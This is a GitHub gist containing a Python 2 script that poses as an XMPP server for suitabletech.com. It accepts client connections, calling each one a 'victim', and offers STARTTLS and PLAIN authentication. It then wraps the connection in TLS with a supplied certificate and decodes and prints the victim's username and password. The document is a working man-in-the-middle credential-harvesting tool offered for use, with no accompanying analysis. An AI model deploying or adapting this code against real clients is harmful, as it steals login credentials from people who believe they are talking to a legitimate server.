Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
import sys, socket, thread, ssl, re, base64
HOST = '0.0.0.0'
PORT = 5222
BUFFER = 2048
message1 = '''<?xml version='1.0'?><stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' from='suitabletech.com' version='1.0' id='yzd6vaewp51cr4pppt8ub8rvuew5x2ev1r1x1gtr'>'''
message2 = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
message2tls = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
message3 = '''<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>r.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
def mitm_thread(victim, certificate, private_key):
try:
# Receive initial message from client
pkt = victim.recv(BUFFER)
print "# Received from victim: %s" % pkt.rstrip()
# Send initial message and starttls with PLAIN
victim.send(message1)
victim.send(message2tls)
# Receive STARTTLS
pkt = victim.recv(BUFFER)
print "# Received from victim: %s" % pkt.rstrip()
# Proceed!
victim.send(message3)
print "# Victim connection switched to TLS"
ssl_socket = ssl.wrap_socket(victim, server_side=True, suppress_ragged_eofs=False, certfile=certificate, keyfile=private_key)
try:
pkt = ssl_socket.recv(BUFFER)
print "# Received from victim: %s" % pkt.rstrip()
# Send initial message and PLAIN
ssl_socket.send(message1)
ssl_socket.send(message2)
# We should now receive the credentials base64-encoded
authblock = ssl_socket.recv(BUFFER)
print "# Received from victim: %s" % authblock.rstrip()
if authblock != '':
credentials_xml = re.search('>(.+)</auth>',authblock).group(1)
credentials = base64.b64decode(credentials_xml).split('\x00')
print "# Found credentials.\n Username: %s\n Password: %s" % (credentials[1],credentials[2])
victim.close()
else:
print "Something went wrong with our TLS certificate"
ssl_socket.close()
except Exception as e:
print "Error inside our TLS socket: ", e
ssl_socket.close()
return
except Exception as e:
print "Error:", e
victim.close()
if __name__=='__main__':
if len(sys.argv) != 3:
sys.exit('Usage: %s <certificate> <private_key>\nExample: %s suitabletech.com.pem suitabletech.com.key' % (sys.argv[0], sys.argv[0]))
certificate = sys.argv[1]
private_key = sys.argv[2]
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
server.listen(2)
print "Started fake XMPP Server on port %s" % PORT
try:
while True:
victim, address = server.accept()
print "New Victim connected: %s" % address[0]
thread.start_new_thread(mitm_thread, (victim, certificate, private_key))
except KeyboardInterrupt:
server.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment